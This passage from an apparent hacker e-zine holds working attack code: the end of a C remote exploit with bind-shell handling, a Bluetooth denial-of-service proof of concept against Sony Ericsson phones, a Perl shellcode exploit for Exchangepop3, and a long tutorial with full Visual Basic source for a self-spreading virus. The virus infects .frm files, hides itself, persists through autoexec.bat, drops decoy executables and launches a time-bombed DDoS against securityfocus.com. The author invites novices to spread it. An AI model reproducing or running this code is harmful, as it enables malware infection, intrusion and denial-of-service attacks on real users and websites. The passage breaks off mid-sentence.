POP+1,nops,shellcode); *len = htons(strlen(ptr)); return (strlen(ptr)+14); } #define STDIN 0 #define STDOUT 1 void ExecuteShell(int Sock) { char buffer[1024 * 10]; int count; fd_set readfs; write(Sock,"uname -a;id\n",12); while(1) { FD_ZERO(&readfs); FD_SET(STDIN, &readfs); FD_SET(Sock, &readfs); if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) { if(FD_ISSET(STDIN, &readfs)) { if((count = read(STDIN, buffer, 1024)) <= 0) { if(errno == EWOULDBLOCK || errno == EAGAIN) continue; else { close(Sock); exit(-1); } } write(Sock, buffer, count); } if(FD_ISSET(Sock, &readfs)) { if((count = read(Sock, buffer, 1024)) <= 0) { if(errno == EWOULDBLOCK || errno == EAGAIN) continue; else { close(Sock); exit(-1); } } write(STDOUT, buffer, count); } } } } void fatal(char *ErrorMsg) { fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); exit(1); } void Usage(char *Prog) { int i; fprintf(stderr, "Usage: %s -h hostname \n\n" "Options:\n\n" " -t target : Select the target\n" " -p portnumber : Sets a new port number \n" " -r bindport : Sets the port to bind a shell \n\n" "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); for(i=0;;i++) { if(Targets[i].Name != 0) fprintf(stderr," [%u] %s\n",i,Targets[i].Name); else break; } fprintf(stderr,"\n"); exit(1); } 007x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*007 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Bluetooth DoS . . . . . . . . . . . . . . . . . . . . . . . . . . Pierre Betouin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 007x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*007 /* Sony/Ericsson reset display - PoC */ /* Pierre BETOUIN - pierre.betouin@infratech.fr */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download www.secuobs.com/news/05022006-bluetooth10.shml */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. */ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include #include #include #include #include #include #include #include #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s \n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; inew (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"25"); unless ($connect) { die "cant connect" } print "\nExchangepop3 v5.0 remote exploit by securma massine\n"; print "\n+++++++++++www.morx.org++++++++++++++++\n"; $connect->recv($text,128); print "$text\n"; $connect->send($mailf . $enter); $connect->recv($text,128); print "$text\n"; $connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode . $enter); print "\nsending exploit......\n\n"; print "\ntelnet to server port 9191 .........\n\n"; 011x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . MS Virus c0ding . . . . . . . . . . . . . . . . . . . . . . . . Two-Twenty . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 011x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*011 ____________________________________________________________ | | |-Guide to making source code viruses using MS Technologies-| |___________________________________________________________| By Two-Twenty _______________________ / \ | Hi. Call Me Harper, | | leader of the American | | revolution which will | | occur in Canada. | \___________ ________/ \ | ~---_ \ | / \ \| x \ | /, \_ _? {_ / {___.| 0 - ___---=== T0K ===---___ 0 - Table 0f Kontentz 1 - Intros 2 - Psudocode and notes 3 - Adding a back door 4 - Adding a payload 5 - Raw viral code 6 - Viral Code attached to working program (final product) 7 - Executing and spreading virus 8 - Outros 1 - ___---=== Intros ===---___ Hello. I am going to keep the commentary on this article short and sweet. This file is going to try to (re)introduce you to the lost art of source code viruses. If you hate any of the following you might enjoy this file: -Microsoft -People who like microsoft -Visual Basic 6.0 -People who like visual basic 6.0 -The open source scene -Full Disclosure of exploits and/or whitehats -Websites where you can upload your open source visual basic programs for others to use, study and enjoy and/or the people who use those sites. -People who like to use http://securityfocus.com to find exploits so they can prawn boxes because they cant make their own exploits. If you love any of the following you may enjoy this file: - Chaos/m4yh4m - Malware/Virus/Interesting Source Code - Ruining some one elses day - (D)DoSing http://securityfocus.com Chapter two is just an introduction to the code and how it will work. Chapter three is the details of how we will add a back door and what functions the back door will provide us. The back door part of the virus is optional, and is not needed, but I included it anyways. Chapter four is where I add a payload to the virus. Chapter five is the raw virus code. It is the code as it would be if it were not attached to any other program. This part of the code can be used to infect other .frm files. I have included this because it makes the virus easyer to study and understand. Chapter six is the virus as it would be if attached to another program. Use the code in chapter six to attack computers as explained in chapter seven. Do you know nothing about Visual basic, programming, viruses or even computers? Thats ok! I make it simple enough for any script toddler to use this virus source to attack other programmers computers and take control of them! Just skip to chapter six, Executing and spreading virus. Chapter seven ties up loose ends. Please note that none of the code in this article is wrapped at 80 colums. This file is aprox. 35 pages long while in notepad at a 1024X768 Resolution. A final note before reading on: I wrote all the code in vb6.0 and tested it many times. To my knowlege this program does work with logic and syntax errors minimal. Spelling and grammer errors are a differnt story tho. I wrote this file for the technical aspect, not to get a good grade in English 101. 2 - ___---=== Psudocode and Understanding this virus ===---___ Source code viruses were much more common in the early 90s. They are rarely seen any more except in old texts. Common source code viruses could be found written in Basic, C and even batch. Most of them were extreemly simple viruses and did little more than write over other source code the virus found, destorying the program in the process. This piece of code I have written does not destroy the source code that it infects and leaves the program functional while still infecting other files in the background while the code runs as inteded. If you read the last k-1ine you might have read the article titled "Another Malware File" By Aftermath. This one is an extention of the file that Aftermath wrote. In a nutshell, this virus finds .frm files, which are visual basic source files stored in plain text, and adds its own code it them. One thing Aftermaths virus did not do was spread without potentialy destroying essential code in the original source code of the .frm file. This new improved virus does this. It also does a lot of things the original does not do. The source code you are about to see is another source code virus, except instead of adding a bunch of text to the end of the frm file, it adds two chunks of code at the beginning of the first two sub functions it finds. This code is a lot less prone to errors and a little less obvious to detect. Here is an example of some high level VB psudocode that is NOT yet infected (pretend you are reading the source code in notepad): ________________________________________________ |#form1.frm - Notepad _=X| | --------------------------------------------- | | | |Subfunction Load Form() | | | | print in message box "hello, welcome!" | | | |End Subfuction | | | | | | | | | | | |Subfunction Unload Form() | | | | print in message box "goodbye!" | | | |End Subfunction | | | | | | | ------------------------------------------------ Ok, so a regualr application. Here is what it will look like when it's hit by this virus: ________________________________________________ |#form1.frm - Notepad _=X| | --------------------------------------------- | | | |Subfunction Load Form() | | | | find original .frm file for the virus source | <- virus source here | | (first part) | find .frm files and store them on computer | <- virus source here | | (first part) | print in message box "hello, welcome!" | <- original source | | |End Subfuction | | | | | | | | | | | |Subfunction Unload Form() | | | | find functions in found frm files | <- virus source here | | (second part/payload) | infect functions with virus source | <- virus source here | | (second part/payload) | print in message box "goodbye!" | <- original source | | |End Subfunction | | | | | | | ------------------------------------------------ Of course it's not that simple, but thats what it does. If there are more than two subfunctions it ignores the rest. It just finds the first two functions to infect. If there is only one function or no function or even if the .frm file is empty for some reason, it does not infect. It will only infect if it finds the beginning and end of two functions. I have tried to make the loops as tight and quickly excuted as possible. Because this is a source code virus, the less code that is copied around the quicker the execution is executed. If you are intent on studying this code then there might be a few built in visual basic 6.0 functions you are unfamilar with. I use this one function that is not often used: "FreeFile" will place a number as the next free open file to use. When doing VB you can only have so many files open at once. I forget how many, but there is a limit. You cant use two file numbers at the same time. For example, you cant do this: open "c:\autoexec.bat" for input as #1 open "c:\config.sys" for binary read as #1 That's a big nono. You will get errors. This code uses inputs and outputs, but because its infecting already made code, we dont want to use #1 if file #1 is already in use. Instead we do this: dim x as integer x = FreeFile Open "C:\autoexec.bat" for input as #x That works fine. If the code already opend up #1 and #2 and #3 and #4, X will be 5. There is not too much more to say except I use lots of "Shell" functions.. these allow commands to be fed into cmd.exe while allowing the vb program to continue to run without waiting for the command to finish executing. If you need this code to run really fast, take out all of the comments (Except for the markers!) and nice paragraph spacing. This will mean it will be harder to debug if something goes wrong but it also means less code to copy around and quicker infection. 3 - ___---=== Adding a back door ===---___ Ok. I decided NOT to add a back door into this version of the virus. If you want to have a backdoor in your own virus then you can write one on your own. It's not hard to write a back door into this virus. I would add it at the very end of the source as commented out text, then bring that text to a text file and compile it using vb6's command line compiler. Voula! Instant EXE back door. Use your n3njh4r skills to make it run at start up. The tools I create are my own and no one elses. You should have this same philosophy. If you want to add a back door, make your own, and replace the included payload that I added. Doing this will be very simple because all you will have to do is replace my "payload" code with your backdoor code 4 - ____---=== Adding a payload ===---___ Ok, so instead of adding a back door into this version of the virus, I decided instead to add a payload. What does the payload do you might ask? It DoSs http://securityfocus.com by sending an http request from a socket Why security focus? Because they publish all the underground soruce codes. When writing this viurs I thought about putting a very extensive bot that would connect to dalnet. This bot would respond to many commands such as DoS functions, proxie functions, keylogger functions, port scanner functions and a few other not so important functions. All of these would be controled through IRC creating a botnet. After thinking about it for a while, I decided that this is unwise. Anydumbshit could place attacks on the visual basic open source community with my code that I so tediously written. This would put the bot code on high alert lists and shit. People would recognize it right away if I tried to use it for anything important, and there might even be "cleaning tools" written by the very security focus people that I dispise. This would be doulbe fold self distruction. So instead I just included a small piece of code that will DoS that dumb site. This is killing two birds with one stone. If anyone thinks its cool to spread a virus, then security focus will be hit with lots of traffic, and the random script kiddy will be cought and put in jail where he will recieve lots of action in the reer, while still allowing people who really want to learn about the dark side of coding to do so. The DoS code I included simply compiles itself to an exe, burries itself in the \system32 file folder and a line of code is written to autoexec.bat so it gets executed every time the computer starts. It will DoS that beiotch with all the sockets the computer can handle, essentialy fuXoring up the computer that it is hosted on. This makes the computer obvoisly broken - so we do a time bomb. Why a time bomb? Well when we release it, we dont want the computers we are infecting to be fucked up right away - we want them to spread the virus around more, so say we release the virus on Febuary 1st. This would give the virus a month to spread before it starts its payload, which will occur immediately after valentines day. I hate valentines day. Hearts suck. In kindergarden we used to pass around hearts to all of our friends. I had the clever idea of passing around farts instead. My teacher called me a shithead. I never liked valentines day after that. So this gives it enough time to spread, but not too much time, because then a lot of people might find the executable, or even worse, a cleaner tool might be created to clean the virus traces. Remember, this is a source code virus that is sitting there in plain text. Its not hard to detect. I used 2000 sockets per host to DoS the address. This may not look like a lot, but if the virus infects 10 computers, thats a potential 20000 connections. I additionaly added 200 sockets to DoS port 22 which will fuck the admins around if they try to remotely fix the DoS attacks that are comming at them. One last note before getting onto the payload source. I added a few tricks that I learned over time that will help the prevention of shutting down the program. One of those tricks is in the sub function "Form_Terminate". When some one tries to shut down the program, the last thing the program will do before completly shutting down is call itself. This wont work 100% of the time, but it often does. Here is the source code for the DoS function. '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Begin VB.Form Form1 Caption = "Form1" ClientHeight = 465 ClientLeft = 1665 ClientTop = 1935 ClientWidth = 1560 Icon = "Form1.frx":0000 LinkTopic = "Form1" ScaleHeight = 465 ScaleWidth = 1560 Begin MSWinsockLib.Winsock Winsock1 Index = 0 Left = 0 Top = 0 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Form_Load() 'built in vb stealth functions Form1.Visible = False doevents App.TaskVisible = False 'time bomb.. must be March - December when it DoSs Dim strmonth As String strmonth = Mid(Date, 4, 2) If strmonth < 3 Then End Dim i As Integer Dim load_sockets As Boolean 'we only want to load the sockets once. If load_sockets = False Then For i = 1 To 2200 Load Winsock1(i) DoEvents load_sockets = True Next i End If '2000 sockets will DoS port 80 For i = 1 To 2000 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "80" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i '200 sockets will DoS port 22 For i = 2001 To 2200 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "22" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i End Sub Private Sub Form_Terminate() 'calling itself if some one tries to shut it down Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe") End Sub Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) 're-opening itself if it closes/times out Winsock1(Index).Close Winsock1(Index).Connect DoEvents End Sub '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- This is just a simple port flooder. Alone it wont do anything, but after a lot of computers are infected then this has the potential to take the website off the intranet, atleast for a while. Later I will explain how this code will be taken from source code and compiled into an exe. 5 - ___---=== Raw viral code ===---___ Here is the virus code that can be used to infect a bunch of other .frm files It is in three sub functions, and includes option explicit. The main reason I have included option explicit is because there is a possibility that the file it will infect also has option explicit enabled. This just helps testing the virus to make sure that we dont accidentaly use a variable that hasnt been delclared. To infect other .frm files with this launch code, execute the first sub fucntion (sub1()), then stop the program (or create a delay that lasts around 4-5 seconds) then execute sub2() sub function. Obviously, visual basic studio 6.0 will be needed. '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Option Explicit Private Sub sub1() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'teh endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 End Sub Private Sub sub2() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As #freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. '.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) & "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Documents and Settings\All Users\Documents\My Music\HotMusic.exe"), vbHide Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "My Downloads\SEXY_BODY.exe"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns half as long 'teh endg End Sub Private Sub Form_Load() 'use these to test and infect Call sub1 'Call Sub2 End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? '-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 6 - ___---=== Viral Code attached to working program (final product)===---___ Here is a program that is infected with the finished and working version of the virus, with the payload included. All that this needs to spread is for some dumb vb developer to run this bad boy and all of his vb6.0 programs that are in 